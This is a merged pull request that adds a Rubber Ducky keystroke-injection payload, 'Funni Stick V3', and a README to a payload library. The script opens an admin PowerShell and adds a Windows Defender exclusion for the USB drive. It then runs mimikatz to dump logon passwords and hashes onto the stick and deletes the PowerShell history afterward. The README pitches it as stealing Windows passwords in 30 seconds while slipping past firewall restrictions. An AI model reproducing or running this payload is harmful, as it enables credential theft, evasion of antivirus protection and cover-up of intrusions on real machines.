Merge pull request #50 from MakeshiftMaker/patch-1

Funni_Stick_V3 initial commit

payloads/library/credentials/Funni_Stick_V3/Funni_Stick_V3

@@ -0,0 +1,52 @@
+REM -----Title: Funni Stick V3
+REM -----Author: Maker (https://github.com/MakeshiftMaker)
+REM -----Desc: A varient of Win_Pass_Grabber by makozort but not reliant on Internet potentially ignoring any server-side-issues with Downloading/Uploading Files and Logs
+REM -----Your Rubber-Ducky will has to run on Twin-Duck Firmware for this to work (see README.txt)
+REM -----Target: Logged in Win10 System with Admin access (maybe Win7 too)
+REM -----ONLY USE THIS ON MACHINES YOU HAVE PERMISSION TO PENTEST, I'M NOT LIABLE FOR ANY MISCHIEF YOU MIGHT CAUSE. I KNOW YOU ARE GOING TO IGNORE THIS. THIS TEXT IS MORE FOR ME THAN IT IS FOR YOU
+
+REM -----Set Default delay to 350 for a midrange computer, for faster computers/testing this can be decreased to 250
+DEFAULT_DELAY 350
+REM -----Delay of 1.5 seconds to let the "Keyboard" initialize
+DELAY 1500
+
+REM -----open Powershell as Admin
+GUI r
+STRING powershell
+CTRL-SHIFT ENTER
+DELAY 1000
+LEFT
+ENTER
+DELAY 500
+
+REM -----This long boy saves the Drive-Letter (E:, F:, G:) into a local variable called duckletter by id'ing it from its Size. This way we can find and execute things saved on there
+REM -----There is propably a better way to do this but i havent figured it out yet
+STRING $duckletter = Get-WmiObject -Query "select * from win32_diskdrive where Size=123379200" | %{gwmi -Query "ASSOCIATORS OF {Win32_DiskDrive.DeviceID=`"$($_.DeviceID.replace('\','\\'))`"} WHERE AssocClass = Win32_DiskDriveToDiskPartition"} |  %{gwmi -Query "ASSOCIATORS OF {Win32_DiskPartition.DeviceID=`"$($_.DeviceID)`"} WHERE AssocClass = Win32_LogicalDiskToPartition"} | %{$_. deviceid}
+ENTER
+REM -----Lets Disable the antivirus (for now)
+STRING Import-Module Defender
+ENTER
+STRING Set-MpPreference -ExclusionPath $duckletter
+ENTER
+REM -----Switch to the Ducky
+STRING cd $duckletter
+ENTER
+REM -----Run Mimikatz and save the output onto a .txt file named after the UserName
+STRING .\pw.exe > $env:UserName`.txt -and type $env:UserName`.txt
+ENTER
+STRING privilege::debug
+ENTER
+STRING sekurlsa::logonPasswords full
+ENTER
+STRING exit
+ENTER
+
+REM -----Cleanup Time!
+REM -----Lets Enable the antivirus again
+STRING Remove-MpPreference -ExclusionPath $duckletter
+ENTER
+REM -----remove Powerhsell history
+STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
+ENTER
+STRING exit
+ENTER

payloads/library/credentials/Funni_Stick_V3/README.txt

@@ -0,0 +1,14 @@
+Funni Stick V3 is the third generation of Maker Inc. Funni Stick Products.
+Steal Windows Passwords in 30 Seconds (or less)!
+
+It runs on the same core principle as the "Simple_User_Password_Grabber" by makozort (https://github.com/makozort thank you makozort!)
+This time using the Twin Duck Firmware on the Rubber-Ducky and a couple of optimiziations it's just the slightest bit faster + it doesnt require Internet access to work potentailly bypassing any firewall/network restrictions.
+One less Dependancy is always good.
+
+For this to work youll need 2 things saved on the Rubber ducky
+1. The Funni_Stick_V3 Script (in inject.bin format)
+2. mimikatz.exe renamed to pw.exe (if you really want to you can change this if you adjust the Funni_Stick_V3 script)
+
+Users and Password(hashes) will be saved back onto the stick named after the Username of the machine it was run on for easy identification.(slick right?)
+It is recommended that you pull out the Ducky after everything is done asap because windows defender might delete your copy of mimikatz.exe
+I tried to be fancy and include a powershell command that automatically ejects the drive. But when i tested it on another USB, the ejection did work, but now i cant plug them back in. Ive bricked 3 USB Sticks this way. Feel free to yell a soloution my way.